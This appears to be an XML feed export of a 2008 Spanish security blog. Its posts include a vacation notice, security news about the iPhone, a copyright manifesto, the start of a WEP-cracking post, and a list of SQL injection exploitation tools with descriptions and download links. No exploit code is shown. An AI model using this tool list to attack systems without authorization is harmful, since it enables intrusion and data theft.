<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-1821337150970789352</id><updated>2011-04-21T23:44:52.621+02:00</updated><category term='Hacktivisimo'/><category term='Eventos'/><category term='BugTrack'/><category term='Nmap'/><category term='Firefox'/><category term='Apache'/><category term='Herramientas'/><category term='Incidentes de seguridad'/><category term='Noticias'/><category term='Virus'/><category term='Distribuciones Linux'/><category term='Wifi'/><title type='text'>Las crónicas de SiD</title><subtitle type='html'>Emitiendo desde el lado oscuro</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>64</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-843480885613623564</id><published>2008-08-01T11:17:00.001+02:00</published><updated>2008-08-01T11:21:16.778+02:00</updated><title type='text'>Cerrado por vacaciones!</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_x7dE_ssr2K8/SJLVPygoNHI/AAAAAAAAAIc/TlvUetYxb8E/s1600-h/vacaciones1.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp3.blogger.com/_x7dE_ssr2K8/SJLVPygoNHI/AAAAAAAAAIc/TlvUetYxb8E/s200/vacaciones1.jpg" alt="" id="BLOGGER_PHOTO_ID_5229476584563946610" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Señoras y señores ,el que les escribe se va de vacaciones...&lt;br /&gt;&lt;br /&gt;Todo el año esperando este momento! oeoeoeooe Estás vacaciones prometo no tocar ni un solo Pc, ;)&lt;br /&gt;&lt;br /&gt;Os veo sobre el 25 de Agosto...con nuevos proyectos que tengo en mente....&lt;br /&gt;&lt;br /&gt;FELICES VACACIONES A TODOS/AS&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-843480885613623564?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/843480885613623564/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=843480885613623564' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/843480885613623564'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/843480885613623564'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/08/cerrado-por-vacaciones.html' title='Cerrado por vacaciones!'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp3.blogger.com/_x7dE_ssr2K8/SJLVPygoNHI/AAAAAAAAAIc/TlvUetYxb8E/s72-c/vacaciones1.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-4025920232522986250</id><published>2008-07-16T09:14:00.006+02:00</published><updated>2008-07-16T09:26:58.947+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Herramientas'/><title type='text'>Sql Injection Tools</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_x7dE_ssr2K8/SH2iCGPwfGI/AAAAAAAAAIU/9Gf_r-deAFs/s1600-h/518053737_8a9794389e.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp3.blogger.com/_x7dE_ssr2K8/SH2iCGPwfGI/AAAAAAAAAIU/9Gf_r-deAFs/s200/518053737_8a9794389e.jpg" alt="" id="BLOGGER_PHOTO_ID_5223509299739786338" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Marchando una de &lt;a href="http://es.wikipedia.org/wiki/Inyecci%C3%B3n_SQL"&gt;Sql Injection&lt;/a&gt;!!&lt;br /&gt;&lt;blockquote&gt;&lt;p&gt;&lt;strong&gt;SQLIer&lt;/strong&gt; - SQLIer takes a vulnerable URL and attempts to determine all the necessary information to exploit the SQL Injection vulnerability by itself, requiring no user interaction at all. &lt;a href="http://bcable.net/project.php?sqlier" target="_blank"&gt;Get SQLIer&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;SQLbftools&lt;/strong&gt; -  SQLbftools is a collection of tools to retrieve MySQL information available using a blind SQL Injection attack. &lt;a href="http://www.reversing.org/node/view/11" target="_blank"&gt;Get SQLbftools&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;SQL Injection Brute-forcer&lt;/strong&gt; - SQLibf is a tool for automatizing the work of detecting and exploiting SQL Injection vulnerabilities. SQLibf can work in Visible and Blind SQL Injection. It works by doing simple logic SQL operations to determine the exposure level of the vulnerable application. &lt;a href="http://www.open-labs.org/sqlibf19beta1.tar.gz" target="_blank"&gt;Get SQLLibf&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;SQLBrute&lt;/strong&gt; - SQLBrute is a tool for brute forcing data out of databases using blind SQL injection vulnerabilities. It supports time based and error based exploit types on Microsoft SQL Server, and error based exploit on Oracle. It is written in Python, uses multi-threading, and doesn’t require non-standard libraries. &lt;a href="http://www.justinclarke.com/security/sqlbrute.py" target="_blank"&gt;Get SQLBrute&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;BobCat&lt;/strong&gt; - BobCat is a tool to aid an auditor in taking full advantage of SQL injection vulnerabilities. It is based on &lt;a href="http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf" target="_blank"&gt;AppSecInc&lt;/a&gt; research. It can list the linked severs, database schema, and allow the retrieval of data from any table that the current application user has access to. &lt;a href="http://www.northern-monkee.co.uk/projects/bobcat/bobcat.html" target="_blank"&gt;Get BobCat&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;SQLMap&lt;/strong&gt; - SQLMap is an automatic blind SQL injection tool, developed in python, capable to perform an active database management system fingerprint, enumerate entire remote databases and much more. The aim of SQLMap is to implement a fully functional database management system tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities. &lt;a href="http://sqlmap.sourceforge.net/" target="_blank"&gt;Get SQLMap&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;&lt;span&gt;&lt;strong&gt;Absinthe&lt;/strong&gt; - &lt;/span&gt;&lt;span&gt; Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database that is vulnerable to Blind SQL Injection. &lt;a href="http://www.0x90.org/releases/absinthe/download.php" target="_blank"&gt;Get Absinthe&lt;/a&gt;.&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;strong&gt;SQL Injection Pen-testing Tool&lt;/strong&gt; - The SQL Injection Tool is a GUI-based utility designed to examine database through vulnerabilities in web-applications&lt;span style="color: rgb(0, 0, 0);"&gt;.&lt;/span&gt; &lt;a href="http://sqltool.itdefence.ru/indexeng.html" target="_blank"&gt;Get SQL Injection Pen-testing tool&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;&lt;span&gt;&lt;strong&gt;SQID&lt;/strong&gt; - &lt;/span&gt; SQL Injection digger (SQLID) is a command line program that looks for SQL injections and common errors in websites. It can perform the follwing operations: look for SQL injection in a web pages and test submit forms for possible SQL injection vulnerabilities. &lt;a href="http://sqid.rubyforge.org/" target="_blank"&gt;Get SQID&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Blind SQL Injection Perl Tool&lt;/strong&gt; -       bsqlbf is a Perl script that lets auditors retrieve information from web sites that are vulnerable to SQL Injection. &lt;a href="http://www.unsec.net/download/bsqlbf.pl" target="_blank"&gt;Get Blind SQL Injection Perl Tool&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;SQL Power Injector&lt;/strong&gt; - SQL Power Injection helps the penetration tester to inject SQL commands on a web page. It’s main strength is its capacity to automate tedious blind SQL injection with several threads. &lt;a href="http://www.sqlpowerinjector.com/" target="_blank"&gt;Get SQL Power Injection&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;FJ-Injector Framwork&lt;/strong&gt; - FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities in web applications. It includes a proxy feature for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation. &lt;a href="http://sourceforge.net/project/showfiles.php?group_id=183841" target="_blank"&gt;Get FJ-Injector Framework&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;SQLNinja&lt;/strong&gt; - SQLNinja is a tool to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end database. &lt;a href="http://sqlninja.sourceforge.net/" target="_blank"&gt;Get SQLNinja&lt;/a&gt;.&lt;/p&gt; &lt;p align="left"&gt;&lt;strong&gt;Automagic SQL Injector&lt;/strong&gt; - The Automagic SQL Injector is an automated SQL injection tool designed to help save time on penetration testing. It is only designed to work with vanilla Microsoft SQL injection holes where errors are returned. &lt;a href="http://www.indianz.ch/tools/attack/automagic.zip" target="_blank"&gt;Get Automagic SQL Injector&lt;/a&gt;.&lt;/p&gt; &lt;p align="left"&gt;&lt;strong&gt;NGSS SQL Injector&lt;/strong&gt; - NGSS SQL Injector exploit vulnerabilities in SQL injection on disparate database servers to gain access to stored data. It currently supports the following databases: Access, DB2, Informix, MSSQL, MySQL, Oracle, Sysbase. &lt;a href="http://www.indianz.ch/tools/attack/sqlinjector.zip" target="_blank"&gt;Get NGSS SQL Injector&lt;/a&gt;.&lt;/p&gt; &lt;/blockquote&gt;Fuente...&lt;a href="http://www.sahw.com/"&gt;Sergio Hernando&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-4025920232522986250?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/4025920232522986250/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=4025920232522986250' title='16 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/4025920232522986250'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/4025920232522986250'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/07/sql-injection-tools.html' title='Sql Injection Tools'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp3.blogger.com/_x7dE_ssr2K8/SH2iCGPwfGI/AAAAAAAAAIU/9Gf_r-deAFs/s72-c/518053737_8a9794389e.jpg' height='72' width='72'/><thr:total>16</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-1776830135943084565</id><published>2008-07-15T10:29:00.001+02:00</published><updated>2008-07-15T10:31:25.959+02:00</updated><title type='text'>(IN)secure Magazine, número 17</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_x7dE_ssr2K8/SHxgQG07XCI/AAAAAAAAAIM/pWudKrcZ4w4/s1600-h/issue-main-17.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp1.blogger.com/_x7dE_ssr2K8/SHxgQG07XCI/AAAAAAAAAIM/pWudKrcZ4w4/s200/issue-main-17.jpg" alt="" id="BLOGGER_PHOTO_ID_5223155497669712930" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Nuevo número de la revista de seguridad on-line número 17&lt;br /&gt;&lt;br /&gt;Para descargar pulsa &lt;a href="http://www.net-security.org/dl/insecure/INSECURE-Mag-17.pdf"&gt;aqui&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-1776830135943084565?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/1776830135943084565/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=1776830135943084565' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/1776830135943084565'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/1776830135943084565'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/07/insecure-magazine-nmero-17.html' title='(IN)secure Magazine, número 17'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_x7dE_ssr2K8/SHxgQG07XCI/AAAAAAAAAIM/pWudKrcZ4w4/s72-c/issue-main-17.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-269140399588587884</id><published>2008-07-15T10:07:00.004+02:00</published><updated>2008-07-15T10:20:10.061+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='BugTrack'/><title type='text'>Actualización de seguridad Iphone/Itouch</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_x7dE_ssr2K8/SHxdSqjY9BI/AAAAAAAAAIE/YpnWhachCLY/s1600-h/desbloqueado1.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp0.blogger.com/_x7dE_ssr2K8/SHxdSqjY9BI/AAAAAAAAAIE/YpnWhachCLY/s200/desbloqueado1.jpg" alt="" id="BLOGGER_PHOTO_ID_5223152243084686354" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Según &lt;a href="http://www.securityfocus.com/brief/774"&gt;he leido hoy &lt;/a&gt;en &lt;a href="http://www.securityfocus.com/"&gt;SecurityFocus&lt;/a&gt;, Apple ha liberado una actulización de seguridad que subsana 13 problemas de seguridad del famoso Iphone 2.0 y Itouch 2.0....&lt;br /&gt;&lt;br /&gt;Apple en una &lt;a href="http://support.apple.com/kb/HT2351"&gt;advisory &lt;/a&gt;explica de que tratan las vulnerabilidades, y claro...si un teléfono tiene navegador....le aplican las &lt;a href="http://blog.washingtonpost.com/securityfix/2008/07/apple_iphone_four_months_behin_1.html"&gt;vulnerabilidades relacionadas&lt;/a&gt; con... ;)&lt;br /&gt;&lt;br /&gt;Será cuestión de tiempo que vuelva a aparecer malware relacionado con la telefonía movil...y en concreto con el famoso Iphone... Es lo que tiene tener un telefono que no solo es teléfono ;)&lt;br /&gt;&lt;br /&gt;Es cuestión de tiempo.... tic tac, tic tac.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-269140399588587884?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/269140399588587884/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=269140399588587884' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/269140399588587884'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/269140399588587884'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/07/actualizacin-de-seguridad-iphoneitouch.html' title='Actualización de seguridad Iphone/Itouch'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_x7dE_ssr2K8/SHxdSqjY9BI/AAAAAAAAAIE/YpnWhachCLY/s72-c/desbloqueado1.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-2787299789800507736</id><published>2008-07-14T10:01:00.004+02:00</published><updated>2008-07-14T10:06:29.661+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='BugTrack'/><title type='text'>El iPhone 3G, hackeado el día de su lanzamiento</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_x7dE_ssr2K8/SHsIVT2aK0I/AAAAAAAAAH8/a4i4G_V21hc/s1600-h/iphoneinterface.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp0.blogger.com/_x7dE_ssr2K8/SHsIVT2aK0I/AAAAAAAAAH8/a4i4G_V21hc/s200/iphoneinterface.jpg" alt="" id="BLOGGER_PHOTO_ID_5222777355064978242" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;b&gt;Apenas unas horas después de que Apple pusiera a la venta la nueva versión de su deseado teléfono, el iPhone OS 2.0 ha sido desbloqueado y hackeado.&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;Los consumidores que consigan hacerse con alguno de los nuevos terminales de Apple podrán realizar el jailbreak y liberarlo sin problemas, tal y como se podía hacer con el modelo anterior. El terminal, presentado oficialmente hoy en España y en 21 países más de todo el mundo, ha generado mucha expectación desde que Apple anunció su lanzamiento el pasado 9 de junio en la Conferencia Mundial de Desarrolladores celebrada en San Francisco.&lt;br /&gt;&lt;br /&gt;Según indica Gizmodo el nuevo sistema operativo no ha durado ni 24 horas sin ser hackeado, a pesar de que se tardó casi dos meses en hacerse público cómo desbloquear el antiguo firmware.&lt;br /&gt;&lt;br /&gt;Gracias a esto, los usuarios tendrán acceso a un gran número de opciones de software, pero sobre todo podrán instalar aplicaciones oficiales e independientes, además de introducir cualquier tarjeta SIM independientemente del operador que sea.&lt;br /&gt;&lt;br /&gt;El hack ha sido realizado por iPhone Dev Team, uno de los grupos más activos en este tipo de tareas, haciendo pruebas anteriores en la versión beta del firmware.&lt;br /&gt;&lt;br /&gt;Fuente: &lt;a href="http://www.hackhispano.com/"&gt;HackHispano&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-2787299789800507736?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/2787299789800507736/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=2787299789800507736' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/2787299789800507736'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/2787299789800507736'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/07/el-iphone-3g-hackeado-el-da-de-su.html' title='El iPhone 3G, hackeado el día de su lanzamiento'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_x7dE_ssr2K8/SHsIVT2aK0I/AAAAAAAAAH8/a4i4G_V21hc/s72-c/iphoneinterface.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-6276642576843567863</id><published>2008-07-08T10:00:00.005+02:00</published><updated>2008-07-14T10:07:19.307+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacktivisimo'/><title type='text'>Manifiesto desde el HackLab "El Patio Maravillas"</title><content type='html'>Esto me ha llegado de la lista de distribución del &lt;a href="http://wh2001.sindominio.net/article.php3?id_article=2"&gt;HackLab &lt;/a&gt;"&lt;a href="http://www.patiomaravillas.net/node/559"&gt;El Patio Maravillas&lt;/a&gt;"&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_x7dE_ssr2K8/SHMf4Y1pyeI/AAAAAAAAAH0/Rmia-ZwAktw/s1600-h/hackademyblackpower.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp3.blogger.com/_x7dE_ssr2K8/SHMf4Y1pyeI/AAAAAAAAAH0/Rmia-ZwAktw/s200/hackademyblackpower.jpg" alt="" id="BLOGGER_PHOTO_ID_5220551446653159906" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:Arial,Helvetica,sans-serif;"&gt;Por favor, multiplica y difunde, utiliza, mejora...&lt;br /&gt;Respuesta colectiva a consecuencia de los últimos ataques a nuestros derechos digitales y en vista del próximo G8 que se promulga "para la protección de la propiedad intelectual" (sic).&lt;br /&gt;(véase: &lt;a rel="nofollow" href="http://www.publico.es/ciencias/tecnologia/132364/poderosos/p2p" target="_blank"&gt;http://www.publico.es/ciencias&lt;wbr&gt;/tecnologia/132364/poderosos&lt;wbr&gt;/p2p&lt;/a&gt;).&lt;br /&gt;Esta carta se está enviando al gobierno y a 287  autoridades.&lt;br /&gt;Puedes menear aquí:&lt;br /&gt;&lt;a rel="nofollow" href="http://meneame.net/story/avaricia-rompe-saco-7-propuestas-enviadas-287-autoridades-para-defende" target="_blank"&gt;http://meneame.net/story&lt;wbr&gt;/avaricia-rompe-saco-7-propuest&lt;wbr&gt;as-enviadas-287-autoridades&lt;wbr&gt;-para-defende&lt;/a&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;LA AVARICIA ROMPE EL SACO&lt;br /&gt;POR UNA CULTURA LIBRE DE CIUDADANOS QUE COMPARTAN:&lt;br /&gt;7 soluciones/realidades más una.&lt;br /&gt;Una respuesta ciudadana a los últimos ataques a las libertades fundamentales perpetrados en nombre de la Propiedad Intelectual&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;_____________________________&lt;br /&gt;&lt;u&gt;&lt;b&gt;Por todo esto PEDIMOS:&lt;/b&gt;&lt;br /&gt;&lt;/u&gt;&lt;b&gt;&lt;u&gt;7 medidas necesarias y urgentes para proteger e impulsar la sociedad del conocimiento en beneficio de todos (todos de verdad ;))&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;1. Considerar cualquier recorte a las redes de intercambio de archivos (redes P2P) como un acto de oscurantismo y un atentado contra los derechos democráticos fundamentales garantizados por nuestra constitución y por innumerables tratados internacionales que el estado español ha ratificado. Nuestros derechos al conocimiento, al aprendizaje, al acceso a la cultura y a la libertad de expresión se verían gravemente socavados si se limitaran las herramientas de las que dispone actualmente la sociedad.&lt;br /&gt;&lt;br /&gt;2. Que las entidades de gestión pasen a ser lo que son: entidades privadas que gestionan SÓLO Y EXCLUSIVAMENTE las “cuentas” de sus socios o sea los derechos de explotación de una parte de los artistas. Que, como toda entidad privada, se permita la libre competencia y que bajo ningún concepto se consienta que entidades privadas hurguen en la privacidad y en los bolsillos de los ciudadanos y menos que se utilicen bienes y suelo público para sus beneficios privados (véase entre miles el ejemplo de la Torre de la Música de Valencia).&lt;br /&gt;&lt;br /&gt;3. Que los creadores sean pagados de forma equitativa sean o no socios de entidades de gestión. Que los artistas cobren, si así lo desean, principalmente por su creación y no por la explotación que genera.&lt;br /&gt;&lt;br /&gt;4. Abolición inmediata del canon digital, impuesto que sanciona indiscriminadamente la ciudadanía en nombre de la “compensación” a la creación por un delito que no es tal, cuando, en realidad, es recaudado en beneficio de pocas personas privadas que raras veces son creadores y menos de algo que esté relacionado con la Cultura. Pagar por ser sospechoso es propio de las dictaduras.&lt;br /&gt;&lt;br /&gt;5. Que una obra pase a ser de Dominio Público en unos plazos beneficiosos para la creación y la sociedad. Permitir que más de una generación viva del trabajo de alguien, es un forma de fomentar el parasitismo y el estancamiento creativo, desactivando la reinversión y más considerando que una medida pensada para favorecer a las personas en realidad beneficia principalmente grandes multinacionales que desvirtúan la creación primigenia. Pedimos el paso al dominio público en un periodo tiempo razonable, dependiendo del tipo de creación, con un máximo de 30 años.&lt;br /&gt;&lt;br /&gt;6. Defender el “derecho a cita” como vehículo de crecimiento democrático de la sociedad de la información.&lt;br /&gt;&lt;br /&gt;7. Eliminar el concepto de “lucro cesante” en todo lo que concierne a la producción cultural.&lt;/b&gt;&lt;br /&gt;______________________________&lt;wbr&gt;______________________________&lt;wbr&gt;_____________&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Y una cosa más:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Porque la cultura libre y colaborativa es la Cultura de nuestra época, porque es un hecho, porque ya no hay vuelta atrás…&lt;br /&gt;&lt;br /&gt;EXGAE presenta:&lt;br /&gt;&lt;br /&gt;Los premios que barrerán los Grammy, los Goya, los Max …&lt;br /&gt;Los 1º premios no competitivos de la historia de la Cultura…&lt;br /&gt;Los 1º premios internacionales de Cultura de la sociedad digital…&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Los premios OXCARS&lt;br /&gt;La eXcelencia es compartir&lt;br /&gt;&lt;br /&gt;Martes 28 de octubre de 2008, Sala Apolo – Barcelona&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Multiplica y reparte.&lt;br /&gt;&lt;br /&gt;Más informaciones:&lt;br /&gt;&lt;a rel="nofollow" href="http://exgae.net/" target="_blank"&gt;http://exgae.net&lt;/a&gt;&lt;br /&gt;Multiplica y reparte&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-6276642576843567863?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/6276642576843567863/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=6276642576843567863' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/6276642576843567863'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/6276642576843567863'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/07/manifiesto-desde-el-hacklab-el-patio.html' title='Manifiesto desde el HackLab &quot;El Patio Maravillas&quot;'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp3.blogger.com/_x7dE_ssr2K8/SHMf4Y1pyeI/AAAAAAAAAH0/Rmia-ZwAktw/s72-c/hackademyblackpower.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-934191266847101038</id><published>2008-07-08T09:21:00.007+02:00</published><updated>2008-07-14T10:06:06.918+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Wifi'/><category scheme='http://www.blogger.com/atom/ns#' term='Distribuciones Linux'/><title type='text'>Ahora me dió por la auditoría de redes Wifi ;)</title><content type='html'>Buenas a todos...&lt;br /&gt;&lt;br /&gt;Sabéis por lo que me ha dado ahora?...si por la auditoría de redes Wifi.. a quien no le gustaría saber lo fácil que resulta romper el cifrado de su conexión &lt;a href="http://es.wikipedia.org/wiki/Wired_Equivalent_Privacy"&gt;WEP&lt;/a&gt;?&lt;br /&gt;&lt;br /&gt;Estoy utilizando una distro, que es un Live Cd de linux para hacer las auditorías, en concreto la distro es &lt;a href="http://www.wifislax.com/"&gt;WifiSlax&lt;/a&gt;&lt;br /&gt;&lt;br 